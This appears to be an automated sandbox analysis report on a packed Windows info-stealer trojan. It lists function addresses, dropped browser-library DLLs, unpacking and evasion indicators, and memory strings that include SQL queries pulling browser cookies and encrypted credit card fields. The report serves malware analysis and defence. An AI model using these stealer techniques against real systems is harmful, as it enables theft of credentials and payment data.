Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091F9EA	0_2_0091F9EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007E0A39	0_2_007E0A39
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007CDBEB	0_2_007CDBEB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091C37B	0_2_0091C37B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00913B60	0_2_00913B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0090B4C2	0_2_0090B4C2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008874FE	0_2_008874FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007EE409	0_2_007EE409
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00918C1C	0_2_00918C1C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091747D	0_2_0091747D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00909DC4	0_2_00909DC4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091A79C	0_2_0091A79C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00911FB9	0_2_00911FB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091DF0E	0_2_0091DF0E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6535A0	0_2_6C6535A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C665440	0_2_6C665440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C545C	0_2_6C6C545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C542B	0_2_6C6C542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CAC00	0_2_6C6CAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695C10	0_2_6C695C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2C10	0_2_6C6A2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65D4E0	0_2_6C65D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C696CF0	0_2_6C696CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6664C0	0_2_6C6664C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D4D0	0_2_6C67D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B34A0	0_2_6C6B34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BC4A0	0_2_6C6BC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80	0_2_6C666C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FD00	0_2_6C66FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67ED10	0_2_6C67ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680512	0_2_6C680512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B85F0	0_2_6C6B85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C690DD0	0_2_6C690DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C6E63	0_2_6C6C6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C670	0_2_6C65C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2E4E	0_2_6C6A2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C674640	0_2_6C674640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C679E50	0_2_6C679E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C693E50	0_2_6C693E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B9E30	0_2_6C6B9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A5600	0_2_6C6A5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697E10	0_2_6C697E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C76E3	0_2_6C6C76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65BEF0	0_2_6C65BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FEF0	0_2_6C66FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B4EA0	0_2_6C6B4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BE680	0_2_6C6BE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C675E90	0_2_6C675E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C669F00	0_2_6C669F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697710	0_2_6C697710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65DFE0	0_2_6C65DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686FF0	0_2_6C686FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A77A0	0_2_6C6A77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69F070	0_2_6C69F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C678850	0_2_6C678850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D850	0_2_6C67D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69B820	0_2_6C69B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A4820	0_2_6C6A4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C667810	0_2_6C667810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67C0E0	0_2_6C67C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6958E0	0_2_6C6958E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C50C7	0_2_6C6C50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6860A0	0_2_6C6860A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66D960	0_2_6C66D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB970	0_2_6C6AB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CB170	0_2_6C6CB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67A940	0_2_6C67A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C9A0	0_2_6C65C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68D9B0	0_2_6C68D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695190	0_2_6C695190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B2990	0_2_6C6B2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C699A60	0_2_6C699A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C671AF0	0_2_6C671AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69E2F0	0_2_6C69E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C698AC0	0_2_6C698AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6522A0	0_2_6C6522A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C684AA0	0_2_6C684AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66CAB0	0_2_6C66CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C2AB0	0_2_6C6C2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CBA90	0_2_6C6CBA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66C370	0_2_6C66C370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C655340	0_2_6C655340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69D320	0_2_6C69D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C53C8	0_2_6C6C53C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65F380	0_2_6C65F380

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C68CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6994D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 005445C0 appears 316 times

Source: file.exe, 00000000.00000002.2329645447.000000006C8D5000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2329354356.000000006C6E2000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: niikbxzg ZLIB complexity 0.9947379951348453

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C6B7030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00559600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00559600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00553720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00553720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\9IPKZ9RJ.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2329531498.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2314092327.000000001D9AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2328955343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2301973505.000000000125E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cardsnl;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2329531498.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2314092327.000000001D9AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2328955343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2329531498.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2314092327.000000001D9AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2328955343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2329531498.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2314092327.000000001D9AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2328955343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2301973505.000000000125E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookieshl;
Source: file.exe, 00000000.00000002.2329531498.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2314092327.000000001D9AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2328955343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2329531498.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2314092327.000000001D9AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2328955343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2314092327.000000001D9AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2328955343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000002.2301973505.000000000125E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookiestl;
Source: file.exe, 00000000.00000003.2175857707.000000001D89B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2160746278.000000001D8A8000.00000004.00000020.00020000.00000000.sdmp, KEBGHCBAEGDHIDGCBAEC.0.dr, AKECBFBAEBKJJJJKFCGC.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2314092327.000000001D9AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2328955343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2314092327.000000001D9AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2328955343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	ReversingLabs: Detection: 50%
Source: file.exe	Virustotal: Detection: 54%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1827328 > 1048576

Source: file.exe

Static PE information: Raw size of niikbxzg is bigger than: 0x100000 < 0x197e00

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2329531498.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2329531498.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2329310300.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.540000.0.unpack :EW;.rsrc :W;.idata :W; :EW;niikbxzg:EW;nnynhmhk:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;niikbxzg:EW;nnynhmhk:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00559860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00559860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1cd476 should be: 0x1c9e95

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: niikbxzg
Source: file.exe	Static PE information: section name: nnynhmhk
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0083C881 push 6B6134CBh; mov dword ptr [esp], ebp	0_2_0083C899
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0083C881 push ebp; mov dword ptr [esp], ebx	0_2_0083C927
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0083C881 push ebx; mov dword ptr [esp], 7FE2BF58h	0_2_0083C967
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0083C881 push 300EDA56h; mov dword ptr [esp], edx	0_2_0083C9C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009BB097 push 5298FC52h; mov dword ptr [esp], edx	0_2_009BB0FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009BB097 push ebp; mov dword ptr [esp], edi	0_2_009BB103
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009978B4 push ebp; mov dword ptr [esp], ecx	0_2_00997903
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009978B4 push eax; mov dword ptr [esp], esp	0_2_00997923
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0099D0DE push 7AA94C1Ch; mov dword ptr [esp], edx	0_2_0099D136
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009AB8D3 push 1E468E3Eh; mov dword ptr [esp], esp	0_2_009AB923
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0055B035 push ecx; ret	0_2_0055B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0099A005 push eax; mov dword ptr [esp], ebp	0_2_0099A081
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009A0004 push 735D0B0Fh; mov dword ptr [esp], ebx	0_2_009A0064
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00879821 push 2A98B1DDh; mov dword ptr [esp], ebx	0_2_0087983E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007FE8A5 push edi; mov dword ptr [esp], edx	0_2_007FE953
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007FE8A5 push 3D598729h; mov dword ptr [esp], ebx	0_2_007FE961
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009DC043 push eax; mov dword ptr [esp], edi	0_2_009DC09D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E2066 push edx; mov dword ptr [esp], 102A0FDEh	0_2_008E208C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E2066 push edi; mov dword ptr [esp], ecx	0_2_008E2097
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E2066 push ecx; mov dword ptr [esp], 2E7F29B1h	0_2_008E20DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009F4196 push 015193A9h; mov dword ptr [esp], ebx	0_2_009F419E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A06987 push ecx; mov dword ptr [esp], ebp	0_2_00A069CC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009E61B5 push 2A870DE6h; mov dword ptr [esp], edi	0_2_009E6210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009DC1B0 push 3909946Fh; mov dword ptr [esp], edi	0_2_009DC1D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009BF9DC push 53ADCAF9h; mov dword ptr [esp], eax	0_2_009BF9FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009BF9DC push 0B59193Ah; mov dword ptr [esp], edi	0_2_009BFA41
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0097D9DA push eax; mov dword ptr [esp], ebp	0_2_0097D9EC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008039D3 push 23999E3Ch; mov dword ptr [esp], ebx	0_2_008039F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008039D3 push 11D07A8Fh; mov dword ptr [esp], ecx	0_2_00803A62
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008039D3 push ebp; mov dword ptr [esp], ebx	0_2_00803A81
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0091F9EA push ebp; mov dword ptr [esp], 00000004h	0_2_0091F9FE

Source: file.exe

Static PE information: section name: niikbxzg entropy: 7.953629957241494

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
